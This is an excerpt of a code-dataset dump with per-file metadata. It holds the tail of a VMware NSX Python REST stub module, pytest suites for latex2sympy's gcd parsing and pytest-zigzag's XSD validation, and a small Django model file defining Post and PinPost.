                    type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
                'com.vmware.vapi.std.errors.invalid_request':
                    type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
                'com.vmware.vapi.std.errors.internal_server_error':
                    type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
                'com.vmware.vapi.std.errors.unauthorized':
                    type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
                'com.vmware.vapi.std.errors.not_found':
                    type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
            }

        # Reference to the View model type (request body and most outputs).
        def view_ref():
            return type.ReferenceType('com.vmware.nsx.model_client', 'View')

        # -- create ------------------------------------------------------
        create_input_type = type.StructType('operation-input', {
            'view': view_ref(),
        })
        create_error_dict = std_errors()
        create_input_value_validator_list = []
        create_output_validator_list = []
        create_rest_metadata = OperationRestMetadata(
            http_method='POST',
            url_template='/api/v1/ui-views',
            request_body_parameter='view',
            path_variables={},
            query_parameters={},
            content_type='application/json')

        # -- delete ------------------------------------------------------
        delete_input_type = type.StructType('operation-input', {
            'view_id': type.StringType(),
        })
        delete_error_dict = std_errors()
        delete_input_value_validator_list = []
        delete_output_validator_list = []
        delete_rest_metadata = OperationRestMetadata(
            http_method='DELETE',
            url_template='/api/v1/ui-views/{view-id}',
            path_variables={'view_id': 'view-id'},
            query_parameters={},
            content_type='application/json')

        # -- get (list, optionally filtered) -----------------------------
        get_input_type = type.StructType('operation-input', {
            'tag': type.OptionalType(type.StringType()),
            'view_ids': type.OptionalType(type.StringType()),
            'widget_id': type.OptionalType(type.StringType()),
        })
        get_error_dict = std_errors()
        get_input_value_validator_list = []
        get_output_validator_list = []
        get_rest_metadata = OperationRestMetadata(
            http_method='GET',
            url_template='/api/v1/ui-views',
            path_variables={},
            query_parameters={
                'tag': 'tag',
                'view_ids': 'view_ids',
                'widget_id': 'widget_id',
            },
            content_type='application/json')

        # -- get_0 (fetch one view by id) --------------------------------
        get_0_input_type = type.StructType('operation-input', {
            'view_id': type.StringType(),
        })
        get_0_error_dict = std_errors()
        get_0_input_value_validator_list = []
        get_0_output_validator_list = []
        get_0_rest_metadata = OperationRestMetadata(
            http_method='GET',
            url_template='/api/v1/ui-views/{view-id}',
            path_variables={'view_id': 'view-id'},
            query_parameters={},
            content_type='application/json')

        # -- update ------------------------------------------------------
        update_input_type = type.StructType('operation-input', {
            'view_id': type.StringType(),
            'view': view_ref(),
        })
        update_error_dict = std_errors()
        update_input_value_validator_list = []
        update_output_validator_list = []
        update_rest_metadata = OperationRestMetadata(
            http_method='PUT',
            url_template='/api/v1/ui-views/{view-id}',
            request_body_parameter='view',
            path_variables={'view_id': 'view-id'},
            query_parameters={},
            content_type='application/json')

        operations = {
            'create': {
                'input_type': create_input_type,
                'output_type': view_ref(),
                'errors': create_error_dict,
                'input_value_validator_list': create_input_value_validator_list,
                'output_validator_list': create_output_validator_list,
                'task_type': TaskType.NONE,
            },
            'delete': {
                'input_type': delete_input_type,
                'output_type': type.VoidType(),
                'errors': delete_error_dict,
                'input_value_validator_list': delete_input_value_validator_list,
                'output_validator_list': delete_output_validator_list,
                'task_type': TaskType.NONE,
            },
            'get': {
                'input_type': get_input_type,
                'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'ViewList'),
                'errors': get_error_dict,
                'input_value_validator_list': get_input_value_validator_list,
                'output_validator_list': get_output_validator_list,
                'task_type': TaskType.NONE,
            },
            'get_0': {
                'input_type': get_0_input_type,
                'output_type': view_ref(),
                'errors': get_0_error_dict,
                'input_value_validator_list': get_0_input_value_validator_list,
                'output_validator_list': get_0_output_validator_list,
                'task_type': TaskType.NONE,
            },
            'update': {
                'input_type': update_input_type,
                'output_type': view_ref(),
                'errors': update_error_dict,
                'input_value_validator_list': update_input_value_validator_list,
                'output_validator_list': update_output_validator_list,
                'task_type': TaskType.NONE,
            },
        }
        rest_metadata = {
            'create': create_rest_metadata,
            'delete': delete_rest_metadata,
            'get': get_rest_metadata,
            'get_0': get_0_rest_metadata,
            'update': update_rest_metadata,
        }
        ApiInterfaceStub.__init__(
            self, iface_name='com.vmware.nsx.ui_views',
            config=config, operations=operations, rest_metadata=rest_metadata,
            is_vapi_rest=False)
class _UpgradeStub(ApiInterfaceStub):
    """REST stub for com.vmware.nsx.upgrade.

    Wraps the ``?action=...`` POST endpoints that abort/execute pre-upgrade
    checks, execute post-upgrade checks, and upgrade the upgrade
    coordinator. All four operations return void.
    """
    def __init__(self, config):
        # Standard five vAPI errors; each operation gets its own dict.
        def std_errors():
            return {
                'com.vmware.vapi.std.errors.service_unavailable':
                    type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
                'com.vmware.vapi.std.errors.invalid_request':
                    type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
                'com.vmware.vapi.std.errors.internal_server_error':
                    type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
                'com.vmware.vapi.std.errors.unauthorized':
                    type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
                'com.vmware.vapi.std.errors.not_found':
                    type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
            }

        # -- abortpreupgradechecks ---------------------------------------
        abortpreupgradechecks_input_type = type.StructType('operation-input', {})
        abortpreupgradechecks_rest_metadata = OperationRestMetadata(
            http_method='POST',
            url_template='/api/v1/upgrade?action=abort_pre_upgrade_checks',
            path_variables={},
            query_parameters={},
            content_type='application/json')

        # -- executepostupgradechecks ------------------------------------
        executepostupgradechecks_input_type = type.StructType('operation-input', {
            'component_type': type.StringType(),
        })
        executepostupgradechecks_rest_metadata = OperationRestMetadata(
            http_method='POST',
            url_template='/api/v1/upgrade/{component-type}?action=execute_post_upgrade_checks',
            path_variables={'component_type': 'component-type'},
            query_parameters={},
            content_type='application/json')

        # -- executepreupgradechecks -------------------------------------
        # Optional filtering/paging knobs, passed through as query params.
        executepreupgradechecks_input_type = type.StructType('operation-input', {
            'component_type': type.OptionalType(type.StringType()),
            'cursor': type.OptionalType(type.StringType()),
            'included_fields': type.OptionalType(type.StringType()),
            'page_size': type.OptionalType(type.IntegerType()),
            'sort_ascending': type.OptionalType(type.BooleanType()),
            'sort_by': type.OptionalType(type.StringType()),
        })
        executepreupgradechecks_rest_metadata = OperationRestMetadata(
            http_method='POST',
            url_template='/api/v1/upgrade?action=execute_pre_upgrade_checks',
            path_variables={},
            query_parameters={
                'component_type': 'component_type',
                'cursor': 'cursor',
                'included_fields': 'included_fields',
                'page_size': 'page_size',
                'sort_ascending': 'sort_ascending',
                'sort_by': 'sort_by',
            },
            content_type='application/json')

        # -- upgradeuc ---------------------------------------------------
        upgradeuc_input_type = type.StructType('operation-input', {})
        upgradeuc_rest_metadata = OperationRestMetadata(
            http_method='POST',
            url_template='/api/v1/upgrade?action=upgrade_uc',
            path_variables={},
            query_parameters={},
            content_type='application/json')

        # Every operation is void-returning, validator-free and raises the
        # same standard errors, so the tables can be built uniformly.
        operations = {}
        rest_metadata = {}
        for op_name, input_type, metadata in (
                ('abortpreupgradechecks', abortpreupgradechecks_input_type,
                 abortpreupgradechecks_rest_metadata),
                ('executepostupgradechecks', executepostupgradechecks_input_type,
                 executepostupgradechecks_rest_metadata),
                ('executepreupgradechecks', executepreupgradechecks_input_type,
                 executepreupgradechecks_rest_metadata),
                ('upgradeuc', upgradeuc_input_type,
                 upgradeuc_rest_metadata),
        ):
            operations[op_name] = {
                'input_type': input_type,
                'output_type': type.VoidType(),
                'errors': std_errors(),
                'input_value_validator_list': [],
                'output_validator_list': [],
                'task_type': TaskType.NONE,
            }
            rest_metadata[op_name] = metadata
        ApiInterfaceStub.__init__(
            self, iface_name='com.vmware.nsx.upgrade',
            config=config, operations=operations, rest_metadata=rest_metadata,
            is_vapi_rest=False)
class StubFactory(StubFactoryBase):
    """Factory exposing the com.vmware.nsx service stubs and child packages.

    ``_attrs`` maps attribute names either to stub classes defined in this
    module, or to dotted-path strings naming a child package's StubFactory.
    NOTE(review): string entries are presumably resolved on demand by
    StubFactoryBase — confirm against vmware.vapi bindings.
    """
    _attrs = {
        # Service stub classes defined in this module.
        'Associations': Associations,
        'Batch': Batch,
        'BridgeClusters': BridgeClusters,
        'BridgeEndpointProfiles': BridgeEndpointProfiles,
        'BridgeEndpoints': BridgeEndpoints,
        'Cluster': Cluster,
        'ClusterProfiles': ClusterProfiles,
        'ComputeCollectionTransportNodeTemplates': ComputeCollectionTransportNodeTemplates,
        'EdgeClusters': EdgeClusters,
        'ErrorResolver': ErrorResolver,
        'FailureDomains': FailureDomains,
        'GlobalConfigs': GlobalConfigs,
        'HostSwitchProfiles': HostSwitchProfiles,
        'IpSets': IpSets,
        'IpfixCollectorProfiles': IpfixCollectorProfiles,
        'IpfixObsPoints': IpfixObsPoints,
        'IpfixProfiles': IpfixProfiles,
        'Licenses': Licenses,
        'LogicalPorts': LogicalPorts,
        'LogicalRouterPorts': LogicalRouterPorts,
        'LogicalRouters': LogicalRouters,
        'LogicalSwitches': LogicalSwitches,
        'MacSets': MacSets,
        'ManualHealthChecks': ManualHealthChecks,
        'MdProxies': MdProxies,
        'MirrorSessions': MirrorSessions,
        'NetworkMigrationSpecs': NetworkMigrationSpecs,
        'Node': Node,
        'Normalizations': Normalizations,
        'NotificationWatchers': NotificationWatchers,
        'NsGroups': NsGroups,
        'NsProfiles': NsProfiles,
        'NsServiceGroups': NsServiceGroups,
        'NsServices': NsServices,
        'ServiceConfigs': ServiceConfigs,
        'SwitchingProfiles': SwitchingProfiles,
        'Tasks': Tasks,
        'Traceflows': Traceflows,
        'TransportNodeCollections': TransportNodeCollections,
        'TransportNodeProfiles': TransportNodeProfiles,
        'TransportNodes': TransportNodes,
        'TransportZones': TransportZones,
        'TransportzoneProfiles': TransportzoneProfiles,
        'TrustManagement': TrustManagement,
        'UiViews': UiViews,
        'Upgrade': Upgrade,
        # Child packages, named by the dotted path of their StubFactory.
        'aaa': 'com.vmware.nsx.aaa_client.StubFactory',
        'administration': 'com.vmware.nsx.administration_client.StubFactory',
        'app_discovery': 'com.vmware.nsx.app_discovery_client.StubFactory',
        'bridge_clusters': 'com.vmware.nsx.bridge_clusters_client.StubFactory',
        'bridge_endpoints': 'com.vmware.nsx.bridge_endpoints_client.StubFactory',
        'capacity': 'com.vmware.nsx.capacity_client.StubFactory',
        'cluster': 'com.vmware.nsx.cluster_client.StubFactory',
        'compute_collection_transport_node_templates': 'com.vmware.nsx.compute_collection_transport_node_templates_client.StubFactory',
        'configs': 'com.vmware.nsx.configs_client.StubFactory',
        'dhcp': 'com.vmware.nsx.dhcp_client.StubFactory',
        'directory': 'com.vmware.nsx.directory_client.StubFactory',
        'dns': 'com.vmware.nsx.dns_client.StubFactory',
        'edge_clusters': 'com.vmware.nsx.edge_clusters_client.StubFactory',
        'eula': 'com.vmware.nsx.eula_client.StubFactory',
        'fabric': 'com.vmware.nsx.fabric_client.StubFactory',
        'firewall': 'com.vmware.nsx.firewall_client.StubFactory',
        'hpm': 'com.vmware.nsx.hpm_client.StubFactory',
        'idfw': 'com.vmware.nsx.idfw_client.StubFactory',
        'intelligence': 'com.vmware.nsx.intelligence_client.StubFactory',
        'ip_sets': 'com.vmware.nsx.ip_sets_client.StubFactory',
        'ipfix': 'com.vmware.nsx.ipfix_client.StubFactory',
        'ipfix_obs_points': 'com.vmware.nsx.ipfix_obs_points_client.StubFactory',
        'ipv6': 'com.vmware.nsx.ipv6_client.StubFactory',
        'licenses': 'com.vmware.nsx.licenses_client.StubFactory',
        'loadbalancer': 'com.vmware.nsx.loadbalancer_client.StubFactory',
        'logical_ports': 'com.vmware.nsx.logical_ports_client.StubFactory',
        'logical_router_ports': 'com.vmware.nsx.logical_router_ports_client.StubFactory',
        'logical_routers': 'com.vmware.nsx.logical_routers_client.StubFactory',
        'logical_switches': 'com.vmware.nsx.logical_switches_client.StubFactory',
        'mac_sets': 'com.vmware.nsx.mac_sets_client.StubFactory',
        'md_proxies': 'com.vmware.nsx.md_proxies_client.StubFactory',
        'migration': 'com.vmware.nsx.migration_client.StubFactory',
        'model': 'com.vmware.nsx.model_client.StubFactory',
        'node': 'com.vmware.nsx.node_client.StubFactory',
        'notification_watchers': 'com.vmware.nsx.notification_watchers_client.StubFactory',
        'ns_groups': 'com.vmware.nsx.ns_groups_client.StubFactory',
        'ns_profiles': 'com.vmware.nsx.ns_profiles_client.StubFactory',
        'pbr': 'com.vmware.nsx.pbr_client.StubFactory',
        'pktcap': 'com.vmware.nsx.pktcap_client.StubFactory',
        'pools': 'com.vmware.nsx.pools_client.StubFactory',
        'proxy': 'com.vmware.nsx.proxy_client.StubFactory',
        'realization_state_barrier': 'com.vmware.nsx.realization_state_barrier_client.StubFactory',
        'service_configs': 'com.vmware.nsx.service_configs_client.StubFactory',
        'serviceinsertion': 'com.vmware.nsx.serviceinsertion_client.StubFactory',
        'switching_profiles': 'com.vmware.nsx.switching_profiles_client.StubFactory',
        'tasks': 'com.vmware.nsx.tasks_client.StubFactory',
        'telemetry': 'com.vmware.nsx.telemetry_client.StubFactory',
        'traceflows': 'com.vmware.nsx.traceflows_client.StubFactory',
        'transport_node_collections': 'com.vmware.nsx.transport_node_collections_client.StubFactory',
        'transport_nodes': 'com.vmware.nsx.transport_nodes_client.StubFactory',
        'transport_zones': 'com.vmware.nsx.transport_zones_client.StubFactory',
        'trust_management': 'com.vmware.nsx.trust_management_client.StubFactory',
        'ui_views': 'com.vmware.nsx.ui_views_client.StubFactory',
        'upgrade': 'com.vmware.nsx.upgrade_client.StubFactory',
    }
| 45.182399
| 187
| 0.601347
| 84,946
| 862,532
| 5.872036
| 0.015327
| 0.076016
| 0.089133
| 0.109702
| 0.909634
| 0.894446
| 0.873404
| 0.853354
| 0.843364
| 0.835537
| 0
| 0.000897
| 0.294622
| 862,532
| 19,089
| 188
| 45.184766
| 0.818953
| 0.275284
| 0
| 0.750969
| 1
| 0.000082
| 0.321096
| 0.218118
| 0
| 0
| 0
| 0
| 0
| 1
| 0.026149
| false
| 0
| 0.00099
| 0
| 0.062196
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
a45a21589babe29e2e4fbea5ba501f7cdc7cb2c5
| 10,004
|
py
|
Python
|
tests/gcd_test.py
|
Na2CuCl4/latex2sympy
|
40f3b16ad13f8ab12d7704bb422cf8580b45b380
|
[
"MIT"
] | 26
|
2021-05-12T09:48:28.000Z
|
2022-03-31T08:33:57.000Z
|
tests/gcd_test.py
|
Na2CuCl4/latex2sympy
|
40f3b16ad13f8ab12d7704bb422cf8580b45b380
|
[
"MIT"
] | null | null | null |
tests/gcd_test.py
|
Na2CuCl4/latex2sympy
|
40f3b16ad13f8ab12d7704bb422cf8580b45b380
|
[
"MIT"
] | 3
|
2021-10-09T03:16:53.000Z
|
2022-02-18T13:23:40.000Z
|
from .context import assert_equal
import pytest
from sympy import Symbol, Rational, UnevaluatedExpr, gcd, igcd, sqrt, pi
# Real-valued symbols shared by the gcd test cases in this module.
x, y, z = (Symbol(name, real=True) for name in ('x', 'y', 'z'))
def test_gcd_usual():
    """gcd of plain integers, parsed via both ``\\gcd`` and
    ``\\operatorname{gcd}`` spellings."""
    # (argument text, expected sympy value); gcd(0, ...) results are wrapped
    # in UnevaluatedExpr exactly as the expected parser output requires.
    cases = [
        ("(18, 3)", gcd(18, 3)),
        ("(3, 18)", gcd(3, 18)),
        ("(2, 2)", gcd(2, 2)),
        ("(0, 21)", UnevaluatedExpr(gcd(0, 21))),
        ("(21, 0)", UnevaluatedExpr(gcd(21, 0))),
        ("(0, 0)", UnevaluatedExpr(gcd(0, 0))),
        ("(6128, 24)", gcd(6128, 24)),
        ("(24, 6128)", gcd(24, 6128)),
        ("(1E20, 1000000)", gcd(Rational('1E20'), 1000000)),
        ("(128*10^32, 1)", gcd(Rational('128E32'), 1)),
    ]
    for prefix in ("\\gcd", "\\operatorname{gcd}"):
        for args, expected in cases:
            assert_equal(prefix + args, expected)
def test_gcd_negative():
    """gcd with one or both arguments negative, via both LaTeX spellings."""
    for cmd in ["\\gcd", "\\operatorname{gcd}"]:
        assert_equal(cmd + "(-12, 4)", gcd(-12, 4))
        assert_equal(cmd + "(219, -9)", gcd(219, -9))
        assert_equal(cmd + "(-8, -64)", gcd(-8, -64))
        assert_equal(cmd + "(-5, -5)", gcd(-5, -5))
        assert_equal(cmd + "(-1, 182033)", gcd(-1, 182033))
        assert_equal(cmd + "(25, -6125)", gcd(25, -6125))
        assert_equal(cmd + "(243, -2.9543127E21)", gcd(243, Rational('-2.9543127E21')))
def test_gcd_float():
    """gcd over decimal, scientific-notation, and irrational inputs."""
    for cmd in ["\\gcd", "\\operatorname{gcd}"]:
        assert_equal(cmd + "(2.4, 3.6)", gcd(Rational('2.4'), Rational('3.6')))
        assert_equal(cmd + "(3.6, 2.4)", gcd(Rational('3.6'), Rational('2.4')))
        assert_equal(cmd + "(\\pi, 3)", gcd(pi, 3))
        assert_equal(cmd + "(618, 1.5)", gcd(618, Rational('1.5')))
        assert_equal(cmd + "(-1.5, 618)", gcd(Rational('-1.5'), 618))
        assert_equal(cmd + "(0.42, 2)", gcd(Rational('0.42'), 2))
        assert_equal(cmd + "(1.43E-13, 21)", gcd(Rational('1.43E-13'), 21))
        assert_equal(cmd + "(21, -143E-13)", gcd(21, Rational('-143E-13')))
        assert_equal(cmd + "(9.80655, 9.80655)", gcd(Rational('9.80655'), Rational('9.80655')))
        assert_equal(cmd + "(0.0000923423, -8341.234802909)", gcd(Rational('0.0000923423'), Rational('-8341.234802909')))
        assert_equal(cmd + "(\\sqrt{5}, \\sqrt{2})", gcd(sqrt(5), sqrt(2)))
def test_gcd_fraction():
    """gcd with rational (fraction) arguments, via both LaTeX spellings."""
    for cmd in ["\\gcd", "\\operatorname{gcd}"]:
        assert_equal(cmd + "(1/2, 3)", gcd(Rational('1/2'), 3))
        assert_equal(cmd + "(3, 1/2)", gcd(3, Rational('1/2')))
        assert_equal(cmd + "(6/2, 3)", gcd(Rational('6/2'), 3))
        assert_equal(cmd + "(1/10, 1/10)", gcd(Rational('1/10'), Rational('1/10')))
        assert_equal(cmd + "(42, 42/6)", gcd(42, Rational('42/6')))
        assert_equal(cmd + "(10000000/10, 10000)", gcd(Rational('10000000/10'), 10000))
def test_gcd_expr():
    """gcd embedded inside larger arithmetic expressions."""
    for cmd in ["\\gcd", "\\operatorname{gcd}"]:
        assert_equal(cmd + "(1+1, 8)", gcd(1 + 1, 8))
        assert_equal("920*" + cmd + "(9, 12*4/2)", 920 * gcd(9, 12 * Rational('4/2')))
        assert_equal(cmd + "(32-128, 10)*22", gcd(32 - 128, 10) * 22)
        assert_equal("\\sqrt{" + cmd + "(1.25E24, 1E12)}", sqrt(gcd(Rational('1.25E24'), Rational('1E12'))))
        assert_equal(cmd + "(92.0, 000+2)", gcd(Rational('92.0'), 000 + 2))
def test_gcd_symbol():
    """gcd with symbolic arguments; comparisons are done symbolically."""
    for cmd in ["\\gcd", "\\operatorname{gcd}"]:
        assert_equal(cmd + "(x, y)", gcd(x, y), symbolically=True)
        assert_equal(cmd + "(y, -x)", gcd(y, -x), symbolically=True)
        assert_equal(cmd + "(2y, x)", gcd(2 * y, x), symbolically=True)
        assert_equal(cmd + "(125, 50x)", gcd(125, 50 * x), symbolically=True)
        assert_equal(cmd + "(x + 76, \\sqrt{x} * 4)", gcd(x + 76, sqrt(x) * 4), symbolically=True)
        assert_equal(cmd + "(y, y)", gcd(y, y), symbolically=True)
        assert_equal("y + " + cmd + "(0.4x, 8/3) / 2", y + gcd(Rational('0.4') * x, Rational('8/3')) / 2, symbolically=True)
        assert_equal("6.673E-11 * (" + cmd + "(8.85418782E-12, 9x) + 4) / 8y", Rational('6.673E-11') * (gcd(Rational('8.85418782E-12'), 9 * x) + 4) / (8 * y), symbolically=True)
def test_multiple_parameters():
    """gcd with more than two arguments (parsed to igcd / nested gcd)."""
    for cmd in ["\\gcd", "\\operatorname{gcd}"]:
        assert_equal(cmd + "(830,450)", gcd(830, 450))
        assert_equal(cmd + "(6,321,429)", igcd(6, 321, 429))
        assert_equal(cmd + "(14,2324)", gcd(14, 2324))
        assert_equal(cmd + "(3, 6, 2)", igcd(3, 6, 2))
        assert_equal(cmd + "(144, 2988, 37116)", igcd(144, 2988, 37116))
        assert_equal(cmd + "(144,2988, 37116,18, 72)", igcd(144, 2988, 37116, 18, 72))
        assert_equal(cmd + "(144, 2988, 37116, 18, 72, 12, 6)", igcd(144, 2988, 37116, 18, 72, 12, 6))
        # A single argument is treated as gcd(n, n).
        assert_equal(cmd + "(32)", gcd(32, 32))
        assert_equal(cmd + "(-8, 4,-2)", gcd(-8, gcd(4, -2)))
        assert_equal(cmd + "(x, y,z)", gcd(x, gcd(y, z)), symbolically=True)
        assert_equal(cmd + "(6*4,48, 3)", igcd(6 * 4, 48, 3))
        assert_equal(cmd + "(6*4,48,3)", igcd(6 * 4, 48, 3))
        assert_equal(cmd + "(2.4,3.6, 0.6)", gcd(Rational('2.4'), gcd(Rational('3.6'), Rational('0.6'))))
        assert_equal(cmd + "(2.4,3.6,0.6)", gcd(Rational('2.4'), gcd(Rational('3.6'), Rational('0.6'))))
        assert_equal(cmd + "(\\sqrt{3},\\sqrt{2}, \\sqrt{100})", gcd(sqrt(3), gcd(sqrt(2), sqrt(100))))
        assert_equal(cmd + "(1E12, 1E6,1E3, 10)", igcd(Rational('1E12'), Rational('1E6'), Rational('1E3'), 10))
| 61.753086
| 181
| 0.609656
| 1,591
| 10,004
| 3.744815
| 0.062225
| 0.234475
| 0.138637
| 0.257469
| 0.910205
| 0.866398
| 0.842397
| 0.816885
| 0.688822
| 0.592816
| 0
| 0.17032
| 0.12435
| 10,004
| 161
| 182
| 62.136646
| 0.509817
| 0
| 0
| 0.057554
| 0
| 0.014388
| 0.357557
| 0.167533
| 0
| 0
| 0
| 0
| 0.913669
| 1
| 0.05036
| false
| 0
| 0.021583
| 0
| 0.071942
| 0
| 0
| 0
| 0
| null | 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a4a2855086a0c8a80eae961e7125a55aa421eccc
| 4,196
|
py
|
Python
|
tests/test_xsd.py
|
ryan-rs/pytest-zigzag
|
7116357ab680a5a9bac47af3ac428f706cee0e93
|
[
"Apache-2.0"
] | 1
|
2021-01-19T23:59:54.000Z
|
2021-01-19T23:59:54.000Z
|
tests/test_xsd.py
|
ryan-rs/pytest-zigzag
|
7116357ab680a5a9bac47af3ac428f706cee0e93
|
[
"Apache-2.0"
] | 3
|
2018-08-23T19:44:46.000Z
|
2019-02-21T22:04:29.000Z
|
tests/test_xsd.py
|
ryan-rs/pytest-zigzag
|
7116357ab680a5a9bac47af3ac428f706cee0e93
|
[
"Apache-2.0"
] | 3
|
2018-08-17T00:37:15.000Z
|
2018-08-21T14:54:56.000Z
|
# -*- coding: utf-8 -*-
"""Test cases for the 'get_xsd' utility function for retrieving the XSD for the project."""
# ======================================================================================================================
# Imports
# ======================================================================================================================
from __future__ import absolute_import
from lxml import etree
# noinspection PyProtectedMember
# noinspection PyPackageRequirements
from zigzag.xml_parsing_facade import XmlParsingFacade
from tests.conftest import run_and_parse
# ======================================================================================================================
# Tests
# ======================================================================================================================
def test_happy_path_asc(testdir, properly_decorated_test_function, mocker, simple_test_config):
    """Verify that 'get_xsd' returns an XSD stream that can be used to validate JUnitXML."""
    # Facade under test, backed by a mocked ZigZag instance.
    facade = XmlParsingFacade(mocker.MagicMock())
    # Generate a decorated test module and run it under the simple config.
    test_module = properly_decorated_test_function.format(
        test_name='test_happy_path',
        test_id='123e4567-e89b-12d3-a456-426655440000',
        jira_id='ASC-123',
    )
    testdir.makepyfile(test_module)
    junit_xml = run_and_parse(testdir, 0, ["--pytest-zigzag-config", simple_test_config])[0].xml_doc
    # noinspection PyProtectedMember
    schema = etree.XMLSchema(etree.parse(facade._get_xsd()))
    # The produced JUnitXML must validate against the project's XSD.
    schema.assertValid(junit_xml)
def test_happy_path_mk8s(testdir, properly_decorated_test_function, mocker, mk8s_test_config):
    """Verify that 'get_xsd' returns an XSD stream that can be used to validate JUnitXML when configured with mk8s."""
    # Facade under test, backed by a mocked ZigZag instance.
    facade = XmlParsingFacade(mocker.MagicMock())
    # Generate a decorated test module and run it under the mk8s config.
    test_module = properly_decorated_test_function.format(
        test_name='test_happy_path',
        test_id='123e4567-e89b-12d3-a456-426655440000',
        jira_id='ASC-123',
    )
    testdir.makepyfile(test_module)
    junit_xml = run_and_parse(testdir, 0, ["--pytest-zigzag-config", mk8s_test_config])[0].xml_doc
    # noinspection PyProtectedMember
    schema = etree.XMLSchema(etree.parse(facade._get_xsd()))
    # The produced JUnitXML must validate against the project's XSD.
    schema.assertValid(junit_xml)
def test_multiple_jira_references(testdir, mocker, simple_test_config):
    """Verify that 'get_xsd' returns an XSD stream when a testcase is decorated Jira mark with multiple
    arguments for the 'asc' CI environment.
    """
    # Facade under test, backed by a mocked ZigZag instance.
    facade = XmlParsingFacade(mocker.MagicMock())
    # Inline test module with a multi-argument Jira mark.
    testdir.makepyfile("""
    import pytest
    @pytest.mark.jira('ASC-123', 'ASC-124')
    @pytest.mark.test_id('123e4567-e89b-12d3-a456-426655440000')
    def test_xsd():
        pass
    """)
    junit_xml = run_and_parse(testdir, 0, ["--pytest-zigzag-config", simple_test_config])[0].xml_doc
    # noinspection PyProtectedMember
    schema = etree.XMLSchema(etree.parse(facade._get_xsd()))
    # The produced JUnitXML must validate against the project's XSD.
    schema.assertValid(junit_xml)
def test_multiple_jira_references_mk8s(testdir, mocker, mk8s_test_config):
    """Verify that 'get_xsd' returns an XSD stream when a testcase is decorated Jira mark with multiple
    arguments for the 'mk8s' CI environment.
    """
    # Facade under test, backed by a mocked ZigZag instance.
    facade = XmlParsingFacade(mocker.MagicMock())
    # Inline test module with a multi-argument Jira mark.
    testdir.makepyfile("""
    import pytest
    @pytest.mark.jira('ASC-123', 'ASC-124')
    @pytest.mark.test_id('123e4567-e89b-12d3-a456-426655440000')
    def test_xsd():
        pass
    """)
    junit_xml = run_and_parse(testdir, 0, ["--pytest-zigzag-config", mk8s_test_config])[0].xml_doc
    # noinspection PyProtectedMember
    schema = etree.XMLSchema(etree.parse(facade._get_xsd()))
    # The produced JUnitXML must validate against the project's XSD.
    schema.assertValid(junit_xml)
| 36.807018
| 120
| 0.57245
| 434
| 4,196
| 5.31106
| 0.209677
| 0.031236
| 0.023861
| 0.050325
| 0.84295
| 0.84295
| 0.811714
| 0.811714
| 0.811714
| 0.811714
| 0
| 0.044054
| 0.226406
| 4,196
| 113
| 121
| 37.132743
| 0.666051
| 0.314347
| 0
| 0.846154
| 0
| 0
| 0.232823
| 0.119616
| 0
| 0
| 0
| 0
| 0.076923
| 1
| 0.076923
| false
| 0.038462
| 0.115385
| 0
| 0.192308
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f11ca51eaa1e46ea2b9a342fd64d6b4e9f22780d
| 621
|
py
|
Python
|
hurry/models.py
|
hugefiver/naiveindex
|
a358f9169168d5c7c790a563b0c93522ababdd8f
|
[
"BSD-3-Clause"
] | 1
|
2018-10-02T04:46:41.000Z
|
2018-10-02T04:46:41.000Z
|
hurry/models.py
|
hugefiver/naiveindex
|
a358f9169168d5c7c790a563b0c93522ababdd8f
|
[
"BSD-3-Clause"
] | null | null | null |
hurry/models.py
|
hugefiver/naiveindex
|
a358f9169168d5c7c790a563b0c93522ababdd8f
|
[
"BSD-3-Clause"
] | 1
|
2019-06-17T08:34:12.000Z
|
2019-06-17T08:34:12.000Z
|
from django.db import models
class Post(models.Model):
    """A post record: title, creation/modification timestamps, and body text."""
    # Display title; at most 20 characters, empty by default.
    title = models.CharField('Title', max_length=20, default='')
    # Stamped once when the row is first created (auto_now_add).
    create_date = models.DateField('CreateDate', auto_now_add=True)
    # Refreshed on every save (auto_now).
    change_date = models.DateField('ChangeDate', auto_now=True)
    # Body of the post.
    main_text = models.TextField('MainText')
class PinPost(models.Model):
    """Like Post, but with an integer 'pin' field — presumably a pin/ordering
    weight (default 1); confirm semantics against the views that query it."""
    # Display title; at most 20 characters, empty by default.
    title = models.CharField('Title', max_length=20, default='')
    # Pin weight/flag; defaults to 1.
    pin = models.IntegerField('Pin', default=1)
    # Stamped once when the row is first created (auto_now_add).
    create_date = models.DateField('CreateDate', auto_now_add=True)
    # Refreshed on every save (auto_now).
    change_date = models.DateField('ChangeDate', auto_now=True)
    # Body of the post.
    main_text = models.TextField('MainText')
| 34.5
| 67
| 0.726248
| 79
| 621
| 5.531646
| 0.405063
| 0.091533
| 0.173913
| 0.100687
| 0.823799
| 0.823799
| 0.823799
| 0.823799
| 0.823799
| 0.823799
| 0
| 0.009328
| 0.136876
| 621
| 17
| 68
| 36.529412
| 0.80597
| 0
| 0
| 0.666667
| 0
| 0
| 0.11129
| 0
| 0
| 0
| 0
